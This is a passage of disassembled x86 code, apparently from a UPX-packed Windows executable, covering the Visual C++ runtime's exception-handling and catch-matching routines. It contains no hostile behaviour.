locret_406C96: ; CODE XREF: sub_406C7C+C�j
retn
sub_406C7C endp
; =============== S U B R O U T I N E =======================================
sub_406C97 proc near ; CODE XREF: sub_406E17+93�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_406CD9
cmp dword ptr [eax+10h], 3
jnz short loc_406CD9
mov ecx, [eax+14h]
cmp ecx, 19930520h
jz short loc_406CC2
cmp ecx, 19930521h
jz short loc_406CC2
cmp ecx, 19930522h
jnz short loc_406CD9
loc_406CC2: ; CODE XREF: sub_406C97+19�j
; sub_406C97+21�j
cmp dword ptr [eax+1Ch], 0
jnz short loc_406CD9
call sub_404927
xor ecx, ecx
inc ecx
mov [eax+20Ch], ecx
mov eax, ecx
retn
; ---------------------------------------------------------------------------
loc_406CD9: ; CODE XREF: sub_406C97+8�j
; sub_406C97+E�j ...
xor eax, eax
retn
sub_406C97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CDC proc near ; CODE XREF: sub_4058D0+112�p
; sub_406F3D+6E�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_40DFD0
call __SEH_prolog4
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short loc_406D19
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_406D19
mov eax, [ecx+1Ch]
test eax, eax
jz short loc_406D19
mov eax, [eax+4]
test eax, eax
jz short loc_406D19
and [ebp+ms_exc.disabled], 0
push eax
push dword ptr [ecx+18h]
call sub_4041C7
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_406D19: ; CODE XREF: sub_406CDC+11�j
; sub_406CDC+19�j ...
call __SEH_epilog4
retn
sub_406CDC endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_407773
; =============== S U B R O U T I N E =======================================
sub_406D30 proc near ; CODE XREF: sub_406FB3+86�p
; sub_406FB3+113�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [ecx]
push esi
mov esi, [esp+4+arg_0]
add eax, esi
cmp dword ptr [ecx+4], 0
jl short loc_406D53
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov esi, [edx+esi]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_406D53: ; CODE XREF: sub_406D30+11�j
pop esi
retn
sub_406D30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D55 proc near ; CODE XREF: sub_407321+111�p
; sub_407321+2AE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
test edi, edi
jnz short loc_406D69
call sub_4077BF
jmp sub_407773
; ---------------------------------------------------------------------------
loc_406D69: ; CODE XREF: sub_406D55+8�j
and [ebp+var_8], 0
cmp dword ptr [edi], 0
mov [ebp+var_1], 0
jle short loc_406DC9
push ebx
push esi
loc_406D78: ; CODE XREF: sub_406D55+70�j
mov eax, [ebp+arg_0]
mov eax, [eax+1Ch]
mov eax, [eax+0Ch]
mov ebx, [eax]
test ebx, ebx
lea esi, [eax+4]
jle short loc_406DBD
mov eax, [ebp+var_8]
shl eax, 4
mov [ebp+var_C], eax
loc_406D93: ; CODE XREF: sub_406D55+60�j
mov ecx, [ebp+arg_0]
push dword ptr [ecx+1Ch]
mov eax, [esi]
push eax
mov eax, [edi+4]
add eax, [ebp+var_C]
push eax
call sub_406B16
add esp, 0Ch
test eax, eax
jnz short loc_406DB9
dec ebx
add esi, 4
test ebx, ebx
jg short loc_406D93
jmp short loc_406DBD
; ---------------------------------------------------------------------------
loc_406DB9: ; CODE XREF: sub_406D55+58�j
mov [ebp+var_1], 1
loc_406DBD: ; CODE XREF: sub_406D55+33�j
; sub_406D55+62�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [edi]
jl short loc_406D78
pop esi
pop ebx
loc_406DC9: ; CODE XREF: sub_406D55+1F�j
mov al, [ebp+var_1]
leave
retn
sub_406D55 endp
; =============== S U B R O U T I N E =======================================
sub_406DCE proc near ; CODE XREF: sub_407321+30A�p
push 4
mov eax, offset loc_40B037
call sub_404591
call sub_404927
cmp dword ptr [eax+94h], 0
jz short loc_406DED
call sub_4077BF
loc_406DED: ; CODE XREF: sub_406DCE+18�j
and dword ptr [ebp-4], 0
call sub_4077AC
or dword ptr [ebp-4], 0FFFFFFFFh
jmp sub_407773
sub_406DCE endp
; ---------------------------------------------------------------------------
call sub_404927
mov ecx, [ebp+8]
push 0
push 0
mov [eax+94h], ecx
call sub_40414D
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E17 proc near ; CODE XREF: sub_4071C3+57�p
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 00406F32 SIZE 00000005 BYTES
push 2Ch
push offset dword_40E048
call __SEH_prolog4
mov ebx, ecx
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov [ebp+var_1C], ebx
and [ebp+var_34], 0
mov eax, [edi-4]
mov [ebp+var_24], eax
push dword ptr [esi+18h]
lea eax, [ebp+var_3C]
push eax
call sub_40446B
pop ecx
pop ecx
mov [ebp+var_28], eax
call sub_404927
mov eax, [eax+88h]
mov [ebp+var_2C], eax
call sub_404927
mov eax, [eax+8Ch]
mov [ebp+var_30], eax
call sub_404927
mov [eax+88h], esi
call sub_404927
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
and [ebp+ms_exc.disabled], 0
xor eax, eax
inc eax
mov [ebp+arg_8], eax
mov [ebp+ms_exc.disabled], eax
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+arg_C]
push edi
call sub_404500
add esp, 14h
mov [ebp+var_1C], eax
and [ebp+ms_exc.disabled], 0
jmp short loc_406F16
; ---------------------------------------------------------------------------
loc_406EA7: ; DATA XREF: UPX1:0040E068�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_406C97
retn
; ---------------------------------------------------------------------------
loc_406EB0: ; DATA XREF: UPX1:0040E06C�o
mov esp, [ebp+ms_exc.old_esp]
call sub_404927
and dword ptr [eax+20Ch], 0
mov esi, [ebp+arg_C]
mov edi, [ebp+arg_4]
cmp dword ptr [esi+4], 80h
jg short loc_406ED4
movsx ecx, byte ptr [edi+8]
jmp short loc_406ED7
; ---------------------------------------------------------------------------
loc_406ED4: ; CODE XREF: sub_406E17+B5�j
mov ecx, [edi+8]
loc_406ED7: ; CODE XREF: sub_406E17+BB�j
mov ebx, [esi+10h]
and [ebp+var_20], 0
loc_406EDE: ; CODE XREF: sub_406E17+11E�j
mov eax, [ebp+var_20]
cmp eax, [esi+0Ch]
jnb short loc_406EFE
imul eax, 14h
add eax, ebx
mov edx, [eax+4]
cmp ecx, edx
jle short loc_406F32
cmp ecx, [eax+8]
jg short loc_406F32
mov eax, [esi+8]
mov ecx, [eax+edx*8+8]
loc_406EFE: ; CODE XREF: sub_406E17+CD�j
push ecx
push esi
push 0
push edi
call sub_406BB6
add esp, 10h
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
loc_406F16: ; CODE XREF: sub_406E17+8E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov [ebp+arg_8], 0
call sub_406F3D
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_406E17 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406E17
loc_406F32: ; CODE XREF: sub_406E17+D9�j
; sub_406E17+DE�j
inc [ebp+var_20]
jmp short loc_406EDE
; END OF FUNCTION CHUNK FOR sub_406E17
; =============== S U B R O U T I N E =======================================
sub_406F37 proc near ; DATA XREF: UPX1:0040E060�o
mov edi, [ebp+0Ch]
mov esi, [ebp+8]
sub_406F37 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_406F3D proc near ; CODE XREF: sub_406E17+10D�p
mov eax, [ebp-24h]
mov [edi-4], eax
push dword ptr [ebp-28h]
call sub_4044B4
pop ecx
call sub_404927
mov ecx, [ebp-2Ch]
mov [eax+88h], ecx
call sub_404927
mov ecx, [ebp-30h]
mov [eax+8Ch], ecx
cmp dword ptr [esi], 0E06D7363h
jnz short locret_406FB2
cmp dword ptr [esi+10h], 3
jnz short locret_406FB2
mov eax, [esi+14h]
cmp eax, 19930520h
jz short loc_406F8E
cmp eax, 19930521h
jz short loc_406F8E
cmp eax, 19930522h
jnz short locret_406FB2
loc_406F8E: ; CODE XREF: sub_406F3D+41�j
; sub_406F3D+48�j
cmp dword ptr [ebp-34h], 0
jnz short locret_406FB2
cmp dword ptr [ebp-1Ch], 0
jz short locret_406FB2
push dword ptr [esi+18h]
call sub_404493
pop ecx
test eax, eax
jz short locret_406FB2
push dword ptr [ebp+10h]
push esi
call sub_406CDC
pop ecx
pop ecx
locret_406FB2: ; CODE XREF: sub_406F3D+31�j
; sub_406F3D+37�j ...
retn
sub_406F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406FB3 proc near ; CODE XREF: sub_407132+36�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset dword_40E070
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40712A
cmp [ecx+8], dl
jz loc_40712A
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_406FEE
test dword ptr [eax], 80000000h
jz loc_40712A
loc_406FEE: ; CODE XREF: sub_406FB3+2D�j
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_406FFB
lea esi, [ecx+esi+0Ch]
loc_406FFB: ; CODE XREF: sub_406FB3+42�j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_407047
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz loc_40710D
push ebx
push esi
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz loc_40710D
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_407038: ; CODE XREF: sub_406FB3+E7�j
push eax
call sub_406D30
pop ecx
pop ecx
mov [esi], eax
jmp loc_407112
; ---------------------------------------------------------------------------
loc_407047: ; CODE XREF: sub_406FB3+51�j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40709C
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz loc_40710D
push ebx
push esi
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz loc_40710D
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_405A70
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_407112
mov eax, [esi]
test eax, eax
jz short loc_407112
add edi, 8
push edi
jmp short loc_407038
; ---------------------------------------------------------------------------
loc_40709C: ; CODE XREF: sub_406FB3+9F�j
cmp [edi+18h], edx
jnz short loc_4070D9
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz short loc_40710D
push ebx
push esi
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz short loc_40710D
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_406D30
pop ecx
pop ecx
push eax
push esi
call sub_405A70
add esp, 0Ch
jmp short loc_407112
; ---------------------------------------------------------------------------
loc_4070D9: ; CODE XREF: sub_406FB3+EC�j
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz short loc_40710D
push ebx
push esi
call sub_409D33
pop ecx
pop ecx
test eax, eax
jz short loc_40710D
push dword ptr [edi+18h]
call sub_409D33
pop ecx
test eax, eax
jz short loc_40710D
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_407112
; ---------------------------------------------------------------------------
loc_40710D: ; CODE XREF: sub_406FB3+62�j
; sub_406FB3+73�j ...
call sub_4077BF
loc_407112: ; CODE XREF: sub_406FB3+8F�j
; sub_406FB3+D7�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40712C
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_407773
; ---------------------------------------------------------------------------
loc_40712A: ; CODE XREF: sub_406FB3+19�j
; sub_406FB3+22�j ...
xor eax, eax
loc_40712C: ; CODE XREF: sub_406FB3+169�j
call __SEH_epilog4
retn
sub_406FB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407132 proc near ; CODE XREF: sub_4071C3+11�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_40E090
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40714E
mov ebx, [ebp+arg_4]
jmp short loc_407158
; ---------------------------------------------------------------------------
loc_40714E: ; CODE XREF: sub_407132+15�j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_407158: ; CODE XREF: sub_407132+1A�j
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_406FB3
add esp, 10h
dec eax
jz short loc_407192
dec eax
jnz short loc_4071AA
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_406D30
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_4041C7
jmp short loc_4071AA
; ---------------------------------------------------------------------------
loc_407192: ; CODE XREF: sub_407132+3F�j
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_406D30
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_4041C7
loc_4071AA: ; CODE XREF: sub_407132+42�j
; sub_407132+5E�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_407132 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_407773
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071C3 proc near ; CODE XREF: sub_40722F+D4�p
; sub_407321+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_4071DC
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_407132
add esp, 10h
loc_4071DC: ; CODE XREF: sub_4071C3+7�j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_4071E8
push esi
jmp short loc_4071EB
; ---------------------------------------------------------------------------
loc_4071E8: ; CODE XREF: sub_4071C3+20�j
push [ebp+arg_18]
loc_4071EB: ; CODE XREF: sub_4071C3+23�j
call sub_4041CE
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_406BB6
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_406E17
add esp, 28h
test eax, eax
jz short loc_40722D
push esi
push eax
call sub_404197
loc_40722D: ; CODE XREF: sub_4071C3+61�j
pop ebp
retn
sub_4071C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40722F proc near ; CODE XREF: sub_407321+336�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40731E
push edi
call sub_404927
cmp dword ptr [eax+80h], 0
jz short loc_407292
call sub_404927
lea edi, [eax+80h]
call sub_404702
cmp [edi], eax
jz short loc_407292
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_407292
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_404286
add esp, 1Ch
test eax, eax
jnz loc_40731D
loc_407292: ; CODE XREF: sub_40722F+22�j
; sub_40722F+36�j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_4072A0
call sub_4077BF
loc_4072A0: ; CODE XREF: sub_40722F+6A�j
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_4043F8
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40731D
push ebx
loc_4072C3: ; CODE XREF: sub_40722F+EB�j
cmp esi, [edi]
jl short loc_40730E
cmp esi, [edi+4]
jg short loc_40730E
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_4072E4
cmp byte ptr [ecx+8], 0
jnz short loc_40730E
loc_4072E4: ; CODE XREF: sub_40722F+AD�j
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40730E
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4071C3
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40730E: ; CODE XREF: sub_40722F+96�j
; sub_40722F+9B�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_4072C3
pop ebx
loc_40731D: ; CODE XREF: sub_40722F+5D�j
; sub_40722F+91�j
pop edi
loc_40731E: ; CODE XREF: sub_40722F+F�j
pop esi
leave
retn
sub_40722F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407321 proc near ; CODE XREF: sub_40768F+D4�p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_407344
movsx ecx, byte ptr [ecx+8]
jmp short loc_407347
; ---------------------------------------------------------------------------
loc_407344: ; CODE XREF: sub_407321+1B�j
mov ecx, [ecx+8]
loc_407347: ; CODE XREF: sub_407321+21�j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_407353
cmp ecx, eax
jl short loc_407358
loc_407353: ; CODE XREF: sub_407321+2C�j
call sub_4077BF
loc_407358: ; CODE XREF: sub_407321+30�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_407633
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_4074A0
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_407390
cmp eax, 19930521h
jz short loc_407390
cmp eax, 19930522h
jnz loc_4074A0
loc_407390: ; CODE XREF: sub_407321+5B�j
; sub_407321+62�j
cmp dword ptr [esi+1Ch], 0
jnz loc_4074A0
call sub_404927
cmp dword ptr [eax+88h], 0
jz loc_407672
call sub_404927
mov esi, [eax+88h]
mov [ebp+arg_0], esi
call sub_404927
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_409D33
test eax, eax
pop ecx
pop ecx
jnz short loc_4073DB
call sub_4077BF
loc_4073DB: ; CODE XREF: sub_407321+B3�j
cmp [esi], edi
jnz short loc_407405
cmp dword ptr [esi+10h], 3
jnz short loc_407405
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_4073FA
cmp eax, 19930521h
jz short loc_4073FA
cmp eax, 19930522h
jnz short loc_407405
loc_4073FA: ; CODE XREF: sub_407321+C9�j
; sub_407321+D0�j
cmp dword ptr [esi+1Ch], 0
jnz short loc_407405
call sub_4077BF
loc_407405: ; CODE XREF: sub_407321+BC�j
; sub_407321+C2�j ...
call sub_404927
cmp dword ptr [eax+94h], 0
jz loc_4074A0
call sub_404927
mov edi, [eax+94h]
call sub_404927
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_406D55
test al, al
pop ecx
jnz short loc_407498
xor ebx, ebx
cmp [edi], ebx
jle short loc_40745F
loc_407442: ; CODE XREF: sub_407321+13C�j
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_40F380
call sub_4027B0
test al, al
jnz short loc_407464
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_407442
loc_40745F: ; CODE XREF: sub_407321+11F�j
; sub_407321+31C�j
jmp sub_407773
; ---------------------------------------------------------------------------
loc_407464: ; CODE XREF: sub_407321+134�j
push 1
push [ebp+arg_0]
call sub_406CDC
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset dword_40C86C
call sub_4023F1
push offset dword_40E0AC
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_40C864
call sub_40414D
loc_407498: ; CODE XREF: sub_407321+119�j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_4074A0: ; CODE XREF: sub_407321+50�j
; sub_407321+69�j ...
cmp [esi], edi
jnz loc_407630
cmp dword ptr [esi+10h], 3
jnz loc_407630
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_4074CB
cmp eax, 19930521h
jz short loc_4074CB
cmp eax, 19930522h
jnz loc_407630
loc_4074CB: ; CODE XREF: sub_407321+196�j
; sub_407321+19D�j
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_407597
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_4043F8
add esp, 14h
mov edi, eax
loc_4074F1: ; CODE XREF: sub_407321+26E�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_407594
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_407589
cmp eax, [edi+4]
jg short loc_407589
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_407589
loc_40751D: ; CODE XREF: sub_407321+23C�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_407552
loc_40752F: ; CODE XREF: sub_407321+22F�j
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_406B16
add esp, 0Ch
test eax, eax
jnz short loc_407561
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40752F
loc_407552: ; CODE XREF: sub_407321+20C�j
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40751D
jmp short loc_407589
; ---------------------------------------------------------------------------
loc_407561: ; CODE XREF: sub_407321+224�j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_4071C3
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_407589: ; CODE XREF: sub_407321+1E1�j
; sub_407321+1EA�j ...
inc [ebp+var_10]
add edi, 14h
jmp loc_4074F1
; ---------------------------------------------------------------------------
loc_407594: ; CODE XREF: sub_407321+1D6�j
mov edi, [ebp+arg_10]
loc_407597: ; CODE XREF: sub_407321+1B1�j
cmp [ebp+arg_14], 0
jz short loc_4075A7
push 1
push esi
call sub_406CDC
pop ecx
pop ecx
loc_4075A7: ; CODE XREF: sub_407321+27A�j
cmp [ebp+var_1], 0
jnz loc_40765F
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40765F
mov edi, [edi+1Ch]
test edi, edi
jz loc_40765F
push esi
call sub_406D55
test al, al
pop ecx
jnz loc_40765F
call sub_404927
call sub_404927
call sub_404927
mov [eax+88h], esi
call sub_404927
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40760C
push [ebp+arg_4]
jmp short loc_40760F
; ---------------------------------------------------------------------------
loc_40760C: ; CODE XREF: sub_407321+2E4�j
push [ebp+arg_1C]
loc_40760F: ; CODE XREF: sub_407321+2E9�j
call sub_4041CE
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_406BB6
add esp, 10h
push dword ptr [esi+1Ch]
call sub_406DCE
loc_407630: ; CODE XREF: sub_407321+181�j
; sub_407321+18B�j ...
mov ebx, [ebp+arg_10]
loc_407633: ; CODE XREF: sub_407321+41�j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40765F
cmp [ebp+arg_14], 0
jnz loc_40745F
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40722F
add esp, 20h
loc_40765F: ; CODE XREF: sub_407321+28A�j
; sub_407321+29C�j ...
call sub_404927
cmp dword ptr [eax+94h], 0
jz short loc_407672
call sub_4077BF
loc_407672: ; CODE XREF: sub_407321+85�j
; sub_407321+34A�j
pop edi
pop esi
pop ebx
leave
retn
sub_407321 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_402457
mov dword ptr [esi], offset off_40C864
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40768F proc near ; CODE XREF: sub_404220+21�p
; UPX0:0040427C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_404927
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_4076D8
mov edx, [ecx]
cmp edx, edi
jz short loc_4076D8
cmp edx, 80000026h
jz short loc_4076D8
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_4076D8
test byte ptr [eax+20h], 1
jnz loc_40776B
loc_4076D8: ; CODE XREF: sub_40768F+27�j
; sub_40768F+2D�j ...
test byte ptr [ecx+4], 66h
jz short loc_407701
cmp dword ptr [eax+4], 0
jz loc_40776B
cmp [ebp+arg_14], 0
jnz short loc_40776B
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_406BB6
add esp, 10h
jmp short loc_40776B
; ---------------------------------------------------------------------------
loc_407701: ; CODE XREF: sub_40768F+4D�j
cmp dword ptr [eax+0Ch], 0
jnz short loc_407719
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40776B
cmp dword ptr [eax+1Ch], 0
jz short loc_40776B
loc_407719: ; CODE XREF: sub_40768F+76�j
cmp [ecx], edi
jnz short loc_40774F
cmp dword ptr [ecx+10h], 3
jb short loc_40774F
cmp [ecx+14h], ebx
jbe short loc_40774F
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40774F
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40776E
; ---------------------------------------------------------------------------
loc_40774F: ; CODE XREF: sub_40768F+8C�j
; sub_40768F+92�j ...
push [ebp+arg_18]
push [ebp+arg_14]
